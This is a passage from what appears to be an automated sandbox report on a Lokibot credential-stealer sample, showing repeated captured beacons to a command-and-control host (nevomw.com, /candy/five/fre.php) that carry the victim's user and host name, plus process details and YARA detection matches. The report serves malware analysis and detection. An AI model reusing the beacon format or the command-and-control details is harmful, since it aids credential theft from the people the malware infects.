                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:24.889547110 CET1280OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:24.964977026 CET1284INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:24 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            89192.168.2.64982545.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:25.252017975 CET1287OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:25.304867983 CET1287OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:25.382786036 CET1290INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:25 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            9192.168.2.64972245.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:46.501884937 CET83OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:46.553891897 CET83OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:46.626796007 CET84INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:46 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            90192.168.2.64982645.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:25.628463984 CET1296OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:25.681499004 CET1296OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:25.760842085 CET1298INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:25 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            91192.168.2.64982845.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:26.033210039 CET1301OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:26.086241007 CET1306OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:26.161587954 CET1307INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:26 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            92192.168.2.64982945.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:26.444756031 CET1318OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:26.496526957 CET1318OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:26.583801031 CET1320INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:26 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            93192.168.2.64983045.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:26.882936001 CET1326OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:26.936121941 CET1327OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:27.009886026 CET1328INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:26 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            94192.168.2.64983245.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:27.289891005 CET1339OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:27.345532894 CET1344OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:27.425017118 CET1345INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:27 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            95192.168.2.64983345.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:27.719155073 CET1352OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:27.772336960 CET1352OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:27.845240116 CET1353INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:27 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            96192.168.2.64983545.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:28.159276962 CET1365OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:28.211191893 CET1365OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:28.285478115 CET1367INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:28 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            97192.168.2.64983745.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:28.578865051 CET1368OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:28.633028030 CET1369OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:28.707381010 CET1373INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:28 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            98192.168.2.64983845.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:28.995225906 CET1381OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:29.048046112 CET1381OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:29.124566078 CET1383INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:29 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            99192.168.2.64984045.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:29.419858932 CET1385OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:29.472934961 CET1385OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:29.546129942 CET1390INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:29 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Code Manipulations

                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            Analysis Process: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe PID: 7108 Parent PID: 5832

                                            General

                                            Start time:11:52:28
                                            Start date:02/12/2020
                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe'
                                            Imagebase:0xec0000
                                            File size:667648 bytes
                                            MD5 hash:2AAA15E28835FEDA9A2E223D82DB2126
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.363844302.0000000003341000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.364641317.0000000004341000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.364641317.0000000004341000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.364641317.0000000004341000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.364641317.0000000004341000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            Chronological Activities

                                            Analysis Process: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe PID: 4852 Parent PID: 7108

                                            General

                                            Start time:11:52:38
                                            Start date:02/12/2020
                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Wow64 process (32bit):true
                                            Commandline:{path}
                                            Imagebase:0x8e0000
                                            File size:667648 bytes
                                            MD5 hash:2AAA15E28835FEDA9A2E223D82DB2126
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.480912778.0000000000E84000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000002.607799523.0000000000E68000.00000004.00000020.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.476321253.0000000000E84000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.452594690.0000000000E7C000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.549778212.0000000000E84000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.546020230.0000000000E84000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.414092067.0000000000E7C000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.491795139.0000000000E85000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.562835408.0000000000E7C000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.563787570.0000000000E7C000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.481769783.0000000000E84000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.474650127.0000000000E84000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.477261856.0000000000E85000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.529649981.0000000000E84000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.480003007.0000000000E84000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.485355648.0000000000E84000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.479061979.0000000000E84000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.446798245.0000000000E7C000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.450970355.0000000000E7C000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.490732616.0000000000E85000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.446675906.0000000000E7D000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.519148526.0000000000E84000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.472912647.0000000000E84000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.565557733.0000000000E7D000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.517673183.0000000000E84000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.396032754.0000000000E7C000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.560853517.0000000000E7C000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.419428408.0000000000E7C000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.535977726.0000000000E84000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.486325651.0000000000E85000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.493532930.0000000000E85000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.533197865.0000000000E84000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.420351505.0000000000E7D000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.532205941.0000000000E84000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.416818180.0000000000E7C000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
